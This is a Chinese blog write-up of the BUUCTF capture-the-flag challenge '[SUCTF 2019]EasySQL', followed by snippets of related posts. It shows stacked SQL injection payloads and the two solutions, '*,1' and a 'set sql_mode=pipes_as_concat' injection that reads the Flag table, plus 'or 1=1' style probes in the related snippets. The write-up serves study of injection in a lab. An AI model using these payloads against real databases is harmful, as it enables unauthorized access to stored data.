[SUCTF 2019]EasySQL

最新推荐文章于 2024-08-03 21:09:41 发布
最新推荐文章于 2024-08-03 21:09:41 发布
阅读量108 收藏 1
点赞数
分类专栏: 刷题 文章标签: sql mysql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaoge1225/article/details/118878477
版权

BUUCTF刷题记录

[SUCTF 2019]EasySQL

在这里插入图片描述
数字型注入??
过滤 and or

堆叠注入
原理执行多句sql 语句
1;show databases;爆库
在这里插入图片描述

1;show tables;爆表
在这里插入图片描述
查水表
1;show columns from Flag;
查不出来,应该是被过滤了
看一下大佬的wp

解法1
输入的内容为*,1
内置的sql语句为
s q l = " s e l e c t " . sql = “select “.sql=“select”.post[‘query’].”||flag from Flag”;
如果$post[‘query’]的数据为*,1,sql语句就变成了select *,1||flag from Flag,也就是*select ,1 from Flag,也就是直接查询出了Flag表中的所有内容

解法2
输入的内容为1;set sql_mode=pipes_as_concat;select 1
其中set sql_mode=pipes_as_concat;的作用为将||的作用由or变为拼接字符串,这是我在本地做的测试,我们执行的语句分别为select 1和set sql_mode=pipes_as_concat和select 1||flag from Flag,读出flag

_Stary
关注
专栏目录
[格式化字符串漏洞+堆溢出] Suctf2019-sudrv
11-21
附件
NSSCTF刷题日记复健day5
SSDZLDL的博客
03-22 860
NSS刷题日记
CTF学习笔记——sql注入(2)
Obs_cure的博客
08-16 628
一、[SUCTF 2019]EasySQL 看标题就知道是关于sql注入的题目。老规矩,先跑一下sqlmap,再用1’ or 1=1 #试试。 全部木大了…看writeup吧…
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 679
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识和扩展
[suctf 2019]EasySQL [SWPUCTF 2021 新生赛]error [强网杯 2019]随便注
最新发布
2301_81866263的博客
08-03 1650
sql_mode : 它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查,其中的 PIPES_AS_CONCAT 将 || 视为字符串的连接操作符而非 “或” 运算符。pipes_as_concat:一个特定的 SQL 模式选项,它意味着在 SQL 查询中用 | 符号(即管道符号)作为字符串连接符,从而允许使用管道符号进行字符串连接。输入*,1,这里会增加一个临时列,他的列名为1,然后那一列的值都为1。讲的是把||设置成了concat函数了就是进行连接。
[SUCTF 2019]EasySQL 1【sql_mode】
PromisingQ
07-27 559
进入靶场环境:http://cc6c0293-a268-489a-8b73-7ad6b73668c5.node3.buuoj.cn/ 输入 1 查询试试: 昨天刚做了一个堆叠的,先试试输入 1;show databases; 1;show tables; 发现目标 Flag ! 可是…然后就进行不下去了…菜鸡的我又去网上寻找思路: select $post['query']||flag from Flag 这是关键语句! 当 sql_mode 设置了 PIPES_AS_CONCAT 时,||
[SUCTF 2019]EasySQL1
bring_coco的博客
09-22 8445
目标]Sql语句的堆叠注入[环境]Buuctf[工具]浏览器[分析]1.试试sql注入正常套路(1)先试试1有回显(2)再试试字母没有回显(3)试试单引号注入提示不一样,因此猜测这里有注入点(4)试试有多少列还是不成功,因此一般的联合查询在这里不能使用(5)基于时间的盲注和报错注入都需要嵌套联合查询语句来实现,因此可以跳过,直接试试布尔型盲注还是不成功2.利用堆叠注入(1)查找所有数据库(2)查询所有表名(3)查询Flag表中的列。
_PE_Format.pdf
03-26
根据提供的文件信息,我们可以推断出这份文档主要讨论的是便携式可执行文件格式(Portable Executable File Format,简称 PE 文件格式),并且是从逆向工程的角度进行探讨的。接下来,我们将详细解读并提取该文件中...
第五题——[SUCTF 2019]EasySQL
分享简单的安全技术
04-01 347
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一个输入栏,通过题目可知是sql注入攻击 第二步:测试sql语句 输入1' or '1'='1测试是否有漏洞,发现被拦截 查看是否存在堆叠注入漏洞,输入1;show tables;#发现存在堆叠漏洞 尝试使用堆叠注入查看flag,发现被被拦截。 查阅资料得知提示:select $post['query']||flag from Flag要让||不是逻辑或 || 具体语法规则为: 当两个操
[SUCTF 2019]EasySQL 的测试笔记
ZQING
11-08 158
看大佬 WP,据大佬推断本题后端的 sql 查询语句为:`select ".$_POST['query']."||flag from Flag`,为什么?
BUUCTF-[极客大挑战 2019]EasySQL 1
keaidxxn的博客
01-22 4668
刚开始看到用户名密码就尝试常用的用户名密码进行登录,发现并没有这么简单: 之后认真审题,发现是sql注入: 于是先在url处进行简单测试(这里可先随便输入账号密码,最主要的是看到它的传参处): 可以看到我们输入的账号密码都显示在url当中,因此可判断为一个get传参。 试下单引号加注释符号,前面随便写一个用户名a: 没有想到,这真的是easysql。 成功得到flag: flag{441bd892-3dcd-4bb0-9f8a-6dcb88954efa} ...
CTF-Web-Sql注入-[SUCTF 2019]EasySQL
weixin_42566218的博客
02-21 2126
BUUCTF-Web-Sql注入-[SUCTF 2019]EasySQL 题目链接:BUUCTF 类型:sql注入 知识点:堆叠注入、mysql异或、mysql服务器变量(sql_mode)、后端代码推测 解题方法:两种方法 这道题考的是一道堆叠注入,题目涉及到了后端代码推测和mysql的部分基础知识,代码推测意思就是构造前端输入根据后端回显信息去推测后端用到的是什么sql语句,这对我这种CTF小白来说根本没什么经验,所以咱就是说根本做不出来!,只能求助官方大大的wp才能勉强做出来 解题过程 方法1
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 3837
EasySQL
web:[SUCTF 2019]EasySQL
sleepywin的博客
09-25 1391
将”||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似.SELECT * 和 SELECT 所有列,两者差别几乎可忽略。所以查询所有字段(或者大多数字段)的时候,可以用select *来操作。|| 逻辑或的短路:a||b计算机发现a是真,那么输出a;如果a是假,那么输出bselect 1 from :建立一个临时列,这个列的所有初始值都被设为1。Mysql中的||0 || 1 = 13 || 4 = 10 || 0 = 0。
sql_mode详解(超详细,亲测有效)
热门推荐
lky_for_lucky的博客
11-27 4万+
写在前面:处理MySQL数据库工作中遇到关于sql_mode的情况,特学习记录一下 1.sql_mode sql_mode是一组语法校验规则 2.查询sql_mode ①命令:select @@GLOBAL.sql_mode或者select @@SESSION.sql_mode 例如:②查看my.conf配置文件 例如:3.设置sql_mode ①命令:SET GLOBAL sql_mode=‘mode’;或者SET SESSION sql_mode=‘mode’;(mode替换为实际配置)。 ②修改my.
suctf 2019 easysql怎么解
03-28
题目描述 easysql是一个基于MySQL的简单查询练习平台。在这里,你可以使用MySQL语言查询数据库中的数据。 题目链接:http://easysql.suctf2019.cn:8888/ 题解 进入网站后,可以看到一个登录页面,尝试使用常见的一些弱口令进行登录,发现均不可行。故考虑其他方式进入系统。 点击右上角的注册按钮,可以看到注册页面。试图使用SQL注入进行注册,发现不可行。 再次尝试登录,发现登录请求中带有username和password两个参数。考虑使用SQL注入进行登录。 在username参数中输入 ' or 1=1#,发现能够成功登录。进入系统后,可以看到一个名为flag的数据库。 不难猜测,flag就在这个数据库中。使用SQL语句查询flag数据库中的所有表。 SELECT table_name FROM information_schema.tables WHERE table_schema='flag'; 然后再查询每个表中的数据。 SELECT * FROM flag.table_name; 得到flag。 flag{easysql_is_so_eassssy}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值